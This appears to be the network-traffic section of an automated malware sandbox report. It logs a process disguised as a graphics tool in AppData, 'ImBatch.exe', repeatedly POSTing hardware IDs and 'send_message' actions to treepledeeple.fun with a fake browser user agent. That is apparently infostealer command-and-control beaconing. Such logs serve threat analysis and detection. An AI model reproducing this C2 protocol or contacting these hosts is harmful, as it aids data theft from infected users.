18	192.168.2.5	49742	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:30.632817984 CEST	546	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:30.633462906 CEST	546	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:30.956063032 CEST	548	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=a7kfc3l7j71udcpv8vou5cmk2t; expires=Tue, 09 Jan 2024 03:10:09 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:30 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=579%2Bd1zuY7bq1VW8Od1zIF9mmmDTi7jnHv2%2BW8DtMxelSciTKeOqGYZg05kJwxDc7EzMv%2BEbwKyg2BPAeY5r%2B3WQxu86lIplqmw4giNKlrw5Edyt5ffo52iAvjZ8vgpPxU0vGQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcfb4a9104398-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:30.956134081 CEST	548	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.5	49743	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:31.162372112 CEST	548	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:31.163073063 CEST	549	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:31.450036049 CEST	550	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=v3khmdtst3fca310gtit0ar1ch; expires=Tue, 09 Jan 2024 03:10:10 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:31 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TVDRfNVGkRWToqogs8YX6LMPdMUA3mT38aQvGrD5qzCUo%2F1Mj6cb1dyCQ%2FH%2FQRozz0x%2Fd3R2hoL8glHDPy5c2ymJM8PCzxRA%2B0h1yOM9ypaQebtEG288q2ZUFIOLJcqN9MOqoA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcfb7fcac4234-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:31.450112104 CEST	550	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49720	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:19.012411118 CEST	333	OUT	GET / HTTP/1.1 Connection: Keep-Alive User-Agent: TeslaBrowser/5.5 Host: treepledeeple.fun
Sep 15, 2023 11:23:19.305294037 CEST	336	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Last-Modified: Fri, 15 Sep 2023 04:50:13 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jresrdk5Mj8H10XmoNS2ygWlhJA6kMqxkd%2FVrOddkPKTlSFE3moRKDqqNyYUA9OQNXCXlR%2B5jcSNG%2F9ljzF9jti0lwBT71rDJTwqrjhW3QNhKXnxA7Qgj7i5ohzhe1zro%2FJ4pw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcf6c0f181978-EWR Data Raw: 32 36 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 20 74 6f 20 6e 67 69 6e 78 21 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 68 74 6d 6c 20 7b 20 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 20 6c 69 67 68 74 20 64 61 72 6b 3b 20 7d 0a 62 6f 64 79 20 7b 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 57 65 6c 63 6f 6d 65 20 74 6f 20 6e 67 69 6e 78 21 3c 2f 68 31 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 73 65 65 20 74 68 69 73 20 70 61 67 65 2c 20 74 68 65 20 6e 67 69 6e 78 20 77 65 62 20 73 65 72 76 65 72 20 69 73 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 69 6e 73 74 61 6c 6c 65 64 20 61 6e 64 0a 77 6f 72 6b 69 6e 67 2e 20 46 75 72 74 68 65 72 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 69 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 0a 3c 70 3e 46 6f 72 20 6f 6e 6c 69 6e 65 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 20 61 6e 64 20 73 75 70 70 6f 72 74 20 70 6c 65 61 73 65 20 72 65 66 65 72 20 74 6f 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 6f 72 67 2f 22 3e 6e 67 69 6e 78 2e 6f 72 67 3c 2f 61 3e 2e 3c 62 72 2f 3e 0a 43 6f 6d 6d 65 72 63 69 61 6c 20 73 75 70 70 6f 72 74 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 61 74 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 63 6f 6d 2f 22 3e 6e 67 69 6e 78 2e 63 6f 6d 3c 2f 61 3e 2e 3c 2f 70 3e 0a 0a 3c 70 3e 3c 65 6d 3e 54 68 61 6e 6b 20 79 6f 75 20 66 6f 72 20 75 73 69 6e 67 20 6e 67 69 6e 78 2e 3c 2f 65 6d 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 267<!DOCTYPE html><html><head><title>Welcome to nginx!</title><style>html { color-scheme: light dark; }body { width: 35em; margin: 0 auto;font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>Welcome to nginx!</h1><p>If you see this page, the nginx web server is successfully installed andworking. Further configuration is required.</p><p>For online documentation and support please refer to<a href="http://nginx.org/">nginx.org</a>.<br/>Commercial support is available at<a href="http://nginx.com/">nginx.com</a>.</p><p><em>Thank you for using nginx.</em></p></body></html>
Sep 15, 2023 11:23:19.305309057 CEST	336	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.5	49744	104.21.87.11	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:31.650408983 CEST	551	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:31.651017904 CEST	552	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:31.948887110 CEST	553	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=nabt1tehvcg3qbjdthtiqgvk1i; expires=Tue, 09 Jan 2024 03:10:10 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:31 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jtxqOI1RRDsQEcNBuf2qFVdiDYZC63co%2B8OjJ6IwmWr1dI9vhWUQ3lNHioBgRtUVjAkbQ4wXjAKqW%2FfbfBIqbl5zM7dlihGbaCQkx8kegDy379GxQ0RfMwPSHhe3erK2h4zlEw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcfbb0cfd32ca-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:31.948929071 CEST	553	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.5	49745	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:32.169025898 CEST	554	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:32.169725895 CEST	554	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:32.756927967 CEST	556	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=8pnoh3qql9l7m0jugkr24ntnvi; expires=Tue, 09 Jan 2024 03:10:11 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:32 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B%2B%2BWabZu7iRKYV7kEE1yRyOPvgtkIEb3dRyJzgk6M68whR9cguBzssajfDSMafpWqtF8%2FazyCvQHLQaL2i1NESOY8ZvLZuVbbjmfV0t7bJ4yYVmgUY0ccDI6f2PmvXBXg2XxCg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcfbe4bec43c8-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:32.757008076 CEST	556	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.5	49746	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:32.989145041 CEST	556	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:32.989795923 CEST	557	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:33.571021080 CEST	558	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=846p75jrkald5ts49lnrgomjlg; expires=Tue, 09 Jan 2024 03:10:12 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:33 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2o%2FDfWS9%2FSGzvouf8W4hFpe%2BXqQ68eBhmh8qoMdsFycRMtZHlYCIJ8Ai%2Bs62UpsBgp1jvzbF85d5OvfDna2LWvIJQ8PRsdiw1I4UQ2SM8hXAVo%2B9Uh7TaRLtTAjsr5HMbPF3pA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcfc36ade421f-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:33.571063042 CEST	558	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.5	49747	104.21.87.11	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:33.802737951 CEST	559	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:33.803478003 CEST	559	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:34.164578915 CEST	561	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=u9fuf285qcp5nbt01bn1b5bv2r; expires=Tue, 09 Jan 2024 03:10:12 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:34 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SE0B7ssmiIL29PY4jQp9W%2FYCRJ3BEU3tF8DRpEQ%2FdIMQ%2BdLWaDkklJqfJo5ZzsZrRZWeymM8l%2BlMLLsge64YCbZul4hzjtpDdOLpwE7UoOTsGZ%2FOXDPYQHA300GpY1d0XPFihA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcfc87a184392-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:34.164597034 CEST	561	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.5	49748	104.21.87.11	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:34.389700890 CEST	562	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:34.390306950 CEST	562	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:34.730376005 CEST	563	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=da8vh5un43c7s6qqe3eqrkel49; expires=Tue, 09 Jan 2024 03:10:13 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:34 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mm84qS%2BefneXiQPUpx7aa1c2724%2FJz3x84lX%2FebqaSdRCnQZB3U0WiseMCzBfrkv9xnJj42vRemVUYwvDKNECSXi%2FmEWGlwve%2BTD8lZghFHEqsVlD2IolRy9NSzDcbzJS9vJIA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcfcc2e711770-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:34.730393887 CEST	563	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.5	49749	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:34.966895103 CEST	564	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:34.967950106 CEST	565	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:35.308991909 CEST	566	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=47ka88la7ubbi5c14ihdh106cg; expires=Tue, 09 Jan 2024 03:10:14 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:35 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OQM%2BiDEbPZ3G5otbq6aNWA%2FdH78Wl%2BiV4rVX%2BiGU9XVToAIcoUdFKIfz4iKEWUir1HPMgEKPXJIZkt1dT9ZSGY5O%2BkmfaNSeNzkBGo16jfRPD9iF0SIzFe0TKC5WrsoTckczcA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcfcfbe2f4388-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:35.309015036 CEST	566	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.5	49750	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:35.855891943 CEST	567	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:35.856803894 CEST	567	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:36.204210997 CEST	569	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=d5tv1tj80coknfqm02b0flr4rf; expires=Tue, 09 Jan 2024 03:10:15 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:36 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: 